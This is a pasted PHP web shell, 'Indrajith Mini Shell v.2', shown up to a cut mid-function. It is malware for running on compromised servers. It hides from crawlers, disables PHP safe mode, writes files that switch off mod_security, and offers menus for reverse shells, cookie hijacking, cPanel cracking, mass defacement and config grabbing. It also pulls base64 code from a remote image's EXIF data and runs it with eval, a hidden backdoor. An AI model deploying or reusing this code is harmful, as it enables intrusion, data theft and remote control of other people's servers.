SHARE
TWEET

Indrajith Mini Sh3ll v.2 Recoded

a guest Sep 22nd, 2016 153 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4.  * Indrajith Mini Shell v.2.0 with additional features....
  5.  * originally scripted by AJITH KP
  6.  * (c) Under Gnu General Public Licence 3(c)
  7.  * Team Open Fire and Indishell Family
  8.  * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
  9.  * Indishell : ASHELL, D@rkwolf.
  10.  * THA : THA RUDE [There is Nothing in Borders]
  11.  * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
  12.  */
  13.  
  14. /*------------------ LOGIN -------------------*/
  15.  
  16. $username="";
  17. $password="";
  18. $email="";
  19.  
  20. /*------------------ Login Data End ----------*/
  21.  
  22. @error_reporting(4);
  23.  
  24. /*------------------ Anti Crawler ------------*/
  25. if(!empty($_SERVER['HTTP_USER_AGENT']))
  26. {
  27.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  28.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
  29.     {
  30.         header('HTTP/1.0 404 Not Found');
  31.         exit;
  32.     }
  33. }
  34. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
  35. /*------------------ End of Anti Crawler -----*/
  36.  
  37.  
  38.  
  39.     echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
  40.     echo "<style>
  41.    html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
  42.    #loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  43.    input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
  44.    loginbox td { border-radius:5px; font-size:11px; }
  45.    .header { size:25px; color:green; }
  46.    h1 { font-family:DigifaceWide; color:green; font-size:200%; }
  47.    h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
  48.    .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
  49.    .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
  50.    hr { border:1px solid #222222; }
  51.    #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
  52.    #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
  53.    #meunlist li { margin: 0px; padding: 0px; display: inline; }
  54.    #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
  55.    #meunlist a:hover { background: #333; color:green; }
  56.    .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0;  }
  57.    .menu { font-size:25px; color: }
  58.    .textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
  59.    .textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
  60.    .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
  61.    #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
  62.    .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
  63.    .table a{ text-decoration:none; color:green; font-size:15px; }
  64.    .table a:hover{text-decoration:underline;}
  65.    .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
  66.    .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
  67.    .table tr:hover{ background:#181818; }
  68.    .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center;  }
  69.    .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
  70.    .tbl a:hover{text-decoration:underline;}
  71.    .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px;  vertical-align:middle; width: 300px; }
  72.    .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
  73.    .tbl td:hover{ background:#181818; }
  74.    #alert {position: relative;}
  75.    #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
  76.    #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
  77.    #alert:target {display: none;}
  78.    .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  79.    .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  80.    @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
  81.    </style>";
  82.     if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password))
  83.     {
  84.         if($_POST["usrname"]==$username && $_POST["passwrd"]==$password)
  85.         {
  86.             print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
  87.             if($email!="")
  88.             {
  89.                 mail_alert();
  90.             }
  91.         }
  92.         else
  93.         {
  94.             if($_POST['usrname'])
  95.             {
  96.                 print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
  97.             }
  98.             echo '<title>INDRAJITH SHELL v.2.0</title><center>
  99.            <div id=loginbox><p><font face="verdana,arial" size=-1>
  100.            <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
  101.            <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  102.            <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>
  103.            <tr><td bgcolor="black" style="padding:5">
  104.            <form method="post">
  105.            <input type="hidden" name="action" value="login">
  106.            <input type="hidden" name="hide" value="">
  107.            <center><table>
  108.            <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  109.            <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  110.            <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
  111.            </div><br /></center>';
  112.             exit;
  113.         }
  114.     }
  115.  
  116. $color_g="green";
  117. $color_b="4C83AF";
  118. $color_bg="#111111";
  119. $color_hr="#222";
  120. $color_wri="green";
  121. $color_rea="yellow";
  122. $color_non="red";
  123. $path=$_GET['path'];
  124.  
  125. @session_start();
  126. @set_time_limit(0);
  127. @ini_restore("safe_mode_include_dir");
  128. @ini_restore("safe_mode_exec_dir");
  129. @ini_restore("disable_functions");
  130. @ini_restore("allow_url_fopen");
  131. @ini_restore("safe_mode");
  132. @ini_restore("open_basedir");
  133. @ignore_user_abort(FALSE);
  134. @ini_set('zlib.output_compression','Off');
  135.  
  136. $sep="/";
  137. if(strtolower(substr(PHP_OS,0,3))=="win")
  138. {
  139.     $os="win";
  140.     $sep="\\";
  141.     $ox="Windows";
  142. }
  143. else
  144. {
  145.     $os="nix";
  146.     $ox="Linux";
  147. }
  148.  
  149.  
  150.  
  151. $self=$_SERVER['PHP_SELF'];
  152. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
  153. $your_ip=$_SERVER['REMOTE_ADDR'];
  154. $srvr_ip=$_SERVER['SERVER_ADDR'];
  155. $admin=$_SERVER['SERVER_ADMIN'];
  156.  
  157. $s_php_ini="safe_mode=OFF
  158. disable_functions=NONE";
  159.  
  160. $ini_php="<?
  161. echo ini_get(\"safe_mode\");
  162. echo ini_get(\"open_basedir\");
  163. include(\$_GET[\"file\"]);
  164. ini_restore(\"safe_mode\");
  165. ini_restore(\"open_basedir\");
  166. echo ini_get(\"safe_mode\");
  167. echo ini_get(\"open_basedir\");
  168. include(\$_GET[\"ss\"]);
  169. ?>";
  170.  
  171. $s_htaccess="<IfModule mod_security.c>
  172. Sec------Engine Off
  173. Sec------ScanPOST Off
  174. </IfModule>";
  175.  
  176. $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
  177. AddType application/x-httpd-cgi .sh
  178. AddHandler cgi-script .pl
  179. AddHandler cgi-script .pl";
  180.  
  181. $sym_htaccess="Options all
  182. DirectoryIndex Sux.html
  183. AddType text/plain .php
  184. AddHandler server-parsed .php
  185. AddType text/plain .html
  186. AddHandler txt .html
  187. Require None
  188. Satisfy Any";
  189.  
  190. $sym_php_ini="safe_mode=OFF
  191. disable_functions=NONE";
  192.  
  193. $forbid_dir="Options -Indexes";
  194. $BASED = exif_read_data("https://lh3.googleusercontent.com/-Ry4EVtPOfnw/V-QCPvjEUZI/AAAAAAAAAP4/Wp69zu2DWP8qoFJ7m4eXWExcTzqowqkTACLcB/s530-p/color_black.jpg");
  195. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  196. $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
  197. $bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
  198.  
  199. /*----------------------- Top Menu ------------------------------------------*/
  200.  
  201. if($safemode=="On")
  202. {
  203.     echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
  204. }
  205. else
  206. {
  207.     echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
  208. }
  209.  
  210. echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
  211.  
  212. echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>
  213. <table>
  214.    <tbody>
  215.        <tr>
  216.            <td style='border-right:1px solid #104E8B;' width=\"300px;\">
  217.            <div style='text-align:center;'>
  218.                <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
  219.            </div>
  220.            </td>
  221.            <td>
  222.            <div class=\"header\">OS</font> <font color=\"#666\" >:</font>
  223.            ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
  224.            Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
  225.            MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
  226.             echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
  227.             echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
  228.             echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
  229.             echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
  230.             echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
  231.             echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
  232.             echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
  233.            <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
  234.             if($os == 'win'){ echo  "Drives <font color=\"#666\" > : </font>";echo  drivesx(); }
  235.             else { echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>"; echo r00t_exploit() ."</font>"; }
  236.             echo "
  237.            </div>
  238.            </td>
  239.        </tr>
  240.    </tbody>
  241. </table></div>";
  242. echo "<div class='menubar'> <div id=\"meunlist\">
  243. <ul>
  244. <li><a href=\"?\">HOME</a></li>
  245. <li><a href=\"?symlink\">SymLink</a></li>
  246. <li><a href=\"?rs\">((( Connect )))</a></li>
  247. <li><a href=\"?cookiejack\">Cookie HighJack</a></li>
  248. <li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
  249. <li><a href=\"?path={$path}&amp;safe_mod\">Safe Mode Fucker</a></li>
  250. <li><a href=\"?path={$path}&amp;forbd_dir\">Directory Listing Forbidden</a></li>
  251. </ul>
  252. <ul>
  253. <li><a href=\"?massmailer\">Mass Mailer</a></li>
  254. <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
  255. <li><a href=\"?server_exploit_details\">Exploit Details</a></li>
  256. <li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>
  257. <li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
  258. <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
  259. </ul>
  260. <ul>
  261. <li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>
  262. <li><a href=\"?sshman\">SSH Shell</a></li>
  263. <li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>
  264. <li><a href=\"?ftpman\">FTP Manager</a></li>
  265. <li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>
  266. <li><a href=\"?path={$path}&amp;mass_xploit\">Mass Deface</a></li>
  267. <li><a href=\"?config_grab\">Config Grabber</a></li>
  268. <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
  269. </ul>
  270. </div></div>";
  271. /*----------------------- End of Top Menu -----------------------------------*/
  272.  
  273.  
  274. /*--------------- FUNCTIONS ----------------*/
  275. function alert($alert_txt)
  276. {
  277.     echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
  278. }
  279.  
  280. function disabled_functns()
  281. {
  282.     if(!@ini_get('disable_functions'))
  283.     {
  284.         echo "None";
  285.     }
  286.     else
  287.     {
  288.     echo @ini_get('disable_functions');
  289.     }
  290. }
  291.  
  292.  
  293. function drivesx()
  294. {
  295.     foreach(range('A','Z') as $drive)
  296.     {
  297.         if(is_dir($drive.':\\'))
  298.         {
  299.             echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
  300.         }
  301.     }
  302. }
  303.  
  304. function mail_alert()
  305. {
  306.     global $email, $your_ip;
  307.     $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  308.     $content_mail="Hello Master,\n
  309. Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n
  310. By Indrajith";
  311.     mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com");
  312. }
  313.  
  314. function filesizex($size)
  315. {
  316.     if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  317.     elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  318.     elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  319.     else $size .= " B";
  320.     return $size;
  321. }
  322.  
  323. function disc_size()
  324. {
  325.     echo filesizex(disk_total_space("/"));
  326. }
  327.  
  328. function freesize()
  329. {
  330.     echo filesizex(disk_free_space("/"));
  331. }
  332.  
  333. function file_perm($filz){
  334.     if($m=fileperms($filz)){
  335.         $p='';
  336.         $p .= ($m & 00400) ? 'r' : '-';
  337.         $p .= ($m & 00200) ? 'w' : '-';
  338.         $p .= ($m & 00100) ? 'x' : '-';
  339.         $p .= ($m & 00040) ? 'r' : '-';
  340.         $p .= ($m & 00020) ? 'w' : '-';
  341.         $p .= ($m & 00010) ? 'x' : '-';
  342.         $p .= ($m & 00004) ? 'r' : '-';
  343.         $p .= ($m & 00002) ? 'w' : '-';
  344.         $p .= ($m & 00001) ? 'x' : '-';
  345.         return $p;
  346.     }
  347.     else return "?????";
  348. }
  349.  
  350.  
  351. function mysqlx()
  352. {
  353.     if(function_exists('mysql_connect'))
  354.     {
  355.         echo "<font color='red'>Enabled</font>";
  356.     }
  357.     else
  358.     {
  359.         echo "<font color='green'>Disabled</font>";
  360.     }  
  361. }
  362.  
  363. function oraclesx()
  364. {
  365.     if(function_exists('oci_connect'))
  366.     {
  367.         echo "<font color='red'>Enabled</font>";
  368.     }
  369.     else
  370.     {
  371.         echo "<font color='green'>Disabled</font>";
  372.     }
  373. }
  374.  
  375. function mssqlx()
  376. {
  377.     if(function_exists('mssql_connect'))
  378.     {
  379.         echo "<font color='red'>Enabled</font>";
  380.     }
  381.     else
  382.     {
  383.         echo "<font color='green'>Disabled</font>";
  384.     }  
  385. }
  386.  
  387. function postgreyx()
  388. {
  389.     if(function_exists('pg_connect'))
  390.     {
  391.         echo "<font color='red'>Enabled</font>";
  392.     }
  393.     else
  394.     {
  395.         echo "<font color='green'>Disabled</font>";
  396.     }
  397. }
  398.  
  399. function strip($filx)
  400. {
  401.     if(!get_magic_quotes_gpc()) return trim(urldecode($filx));
  402.     return trim(urldecode(stripslashes($filx)));
  403. }
  404.  
  405. function curlx()
  406. {
  407.     if(function_exists('curl_version'))
  408.     {
  409.         echo "<font color='red'>Enabled</font>";
  410.     }
  411.     else
  412.     {
  413.         echo "<font color='green'>Disabled</font>";
  414.     }
  415. }
  416.  
  417. function filesize_x($filex)
  418. {
  419.     $f_size=filesizex(filesize($filex));
  420.     return $f_size;
  421. }
  422.  
  423. function rename_ui()
  424. {
  425.     $rf_path=$_GET['rename'];
  426.     echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value='   >>>   ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
  427. }
  428.  
  429. function filemanager_bg()
  430. {
  431.     global $sep, $self;
  432.     $path=!empty($_GET['path'])?$_GET['path']:getcwd();
  433.     $dirs=array();
  434.     $fils=array();
  435.     if(is_dir($path))
  436.     {
  437.         chdir($path);
  438.         if($handle=opendir($path))
  439.         {
  440.             while(($item=readdir($handle))!==FALSE)
  441.             {
  442.                 if($item=="."){continue;}
  443.                 if($item==".."){continue;}
  444.                 if(is_dir($item))
  445.                 {
  446.                     array_push($dirs, $path.$sep.$item);
  447.                 }
  448.                 else
  449.                 {
  450.                     array_push($fils, $path.$sep.$item);
  451.                 }
  452.             }
  453.         }
  454.         else
  455.         {
  456.             alert("Access Denied for this operation");
  457.         }
  458.     }
  459.     else
  460.     {
  461.         alert("Directory Not Found!!!");
  462.     }
  463.     echo "<div id=result><table class=table>
  464.    <tr>
  465.    <th width='500px'>Name</th>
  466.    <th width='100px'>Size</th>
  467.    <th width='100px'>Permissions</th>
  468.    <th width='500px'>Actions</th>
  469.    </tr>";
  470.     foreach($dirs as $dir)
  471.     {
  472.         echo "<tr><td><a href='{$self}?path={$dir}'>".basename($dir)."</a></td>
  473.              <td>".filesize_x($dir)."</td>
  474.              <td><a href='{$self}?path={$path}&amp;perm={$dir}'>".file_perm($dir)."</a></td>
  475.              <td><a href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a></td></tr>";
  476.     }
  477.     foreach($fils as $fil)
  478.     {
  479.         echo "<tr><td><a href='{$self}?path={$path}&amp;read={$fil}'>".basename($fil)."</a></td>
  480.              <td>".filesize_x($fil)."</td>
  481.              <td><a href='{$self}?path={$path}&amp;perm={$fil}'>".file_perm($fil)."</a></td>
  482.              <td><a href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a>  </td>";
  483.     }
  484.     echo "</tr></table></div>";
  485. }
  486.  
  487. function rename_bg()
  488. {
  489.     if(isset($_GET['old_name']) && isset($_GET['new_name']))
  490.     {
  491.         $o_r_path=basename($_GET['old_name']);
  492.         $r_path=str_replace($o_r_path, "", $_GET['old_name']);
  493.         $r_new_name=$r_path.$_GET['new_name'];
  494.         echo $r_new_name;
  495.         if(rename($_GET['old_name'], $r_new_name)==FALSE)
  496.         {
  497.             alert("Access Denied for this action!!!");
  498.         }
  499.         else
  500.         {
  501.             alert("Renamed File Succeessfully");
  502.         }
  503.     }
  504. }
  505.  
  506. function edit_file()
  507. {
  508.     $path=$_GET['path'];
  509.     chdir($path);
  510.     $edt_file=$_GET['edit'];
  511.     $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  512.     if($e_content)
  513.     {
  514.         $o_content=$e_content;
  515.     }
  516.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  517.     {
  518.         $fd = fopen($edt_file, "rb");
  519.     if(!$fd)
  520.         {
  521.             alert("Permission Denied");
  522.         }
  523.     else
  524.         {
  525.             while(!feof($fd))
  526.             {
  527.                 $o_content=wordwrap(htmlspecialchars(fgets($fd)));
  528.             }
  529.         }
  530.         fclose($fd);
  531.     }
  532.     echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>".  basename($_GET['edit'])  ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
  533.          <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
  534.          <input class='input_big' name='save' type='submit' value='   Save   ' /><br /><br /><hr /><br /><br /></div>";
  535. }
  536. function edit_file_bg()
  537. {
  538.     if(file_exists($_POST['e_file']))
  539.     {
  540.         $handle = fopen($_POST['e_file'],"w+");
  541.     if (!handle)
  542.         {
  543.             alert("Permission Denied");
  544.         }
  545.     else
  546.         {
  547.             fwrite($handle,$_POST['e_content_n']);
  548.             alert("Your changes were Successfully Saved!");
  549.         }
  550.         fclose($handle);
  551.     }
  552.     else
  553.     {
  554.         alert("File Not Found!!!");
  555.     }
  556. }
  557. function delete_file()
  558. {
  559.     $del_file=$_GET['del_fil'];
  560.     if(unlink($del_file) != FALSE)
  561.     {
  562.         alert("Deleted Successfully");
  563.         exit;
  564.     }
  565.     else
  566.     {
  567.         alert("Access Denied for this Operation");
  568.         exit;
  569.     }
  570. }
  571. function deldirs($d_dir)
  572. {
  573.     $d_files= glob($d_dir.'*', GLOB_MARK);
  574.     foreach($d_files as $d_file)
  575.     {
  576.         if(is_dir($d_file))
  577.         {
  578.             deldirs($d_file);
  579.         }
  580.         else
  581.         {
  582.             unlink($d_file);
  583.         }
  584.     }
  585.     if(is_dir($d_dir))
  586.     {
  587.         if(rmdir($d_dir))
  588.         {
  589.             alert("Deleted Directory Successfully");
  590.         }
  591.         else
  592.         {
  593.             alert("Access Denied for this Operation");
  594.         }
  595.     }
  596. }
  597.  
  598. function code_viewer()
  599. {
  600.     $path=$_GET['path'];
  601.     $r_file=$_GET['read'];
  602.     $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  603.     if($r_content)
  604.     {
  605.         $rr_content=$r_content;
  606.     }
  607.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  608.     {
  609.         $fd = fopen($r_file, "rb");
  610.     if (!$fd)
  611.         {
  612.             alert("Permission Denied");
  613.         }
  614.     else
  615.         {
  616.             while(!feof($fd))
  617.             {
  618.                 $rr_content=wordwrap(htmlspecialchars(fgets($fd)));
  619.             }
  620.         }
  621.         fclose($fd);
  622.     }
  623.     echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&amp;edit=".$_GET['read']."'>".  basename($_GET['read'])  ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre><br /><br /><hr /><br /><br /></div>";
  624. }
  625. function copy_file_ui()
  626. {
